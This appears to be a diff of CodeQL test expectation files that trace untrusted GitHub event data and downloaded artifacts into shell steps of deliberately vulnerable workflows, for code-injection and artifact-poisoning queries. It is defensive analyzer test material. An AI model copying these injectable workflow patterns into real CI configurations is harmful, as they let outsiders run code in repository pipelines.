b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -19,28 +19,28 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | -| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | -| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | -| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | provenance | | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | provenance | | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | provenance | | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | provenance | | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | provenance | | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | provenance | | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | provenance | | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | provenance | | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | provenance | | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | provenance | | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | provenance | | -| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | provenance | | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | provenance | | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | provenance | | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | provenance | | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | provenance | | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | provenance | | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | provenance | | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | provenance | | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | provenance | | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | provenance | | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | provenance | | +| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | semmle.label | github.event['pull_request']['body'] | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/untrusted_checkout1.yml:11:9:14:6 | Run Step: artifact [pr_number] | semmle.label | Run Step: artifact [pr_number] | | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -51,7 +48,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index e1532c06cdc8..8d9465077995 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,24 +1,21 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make 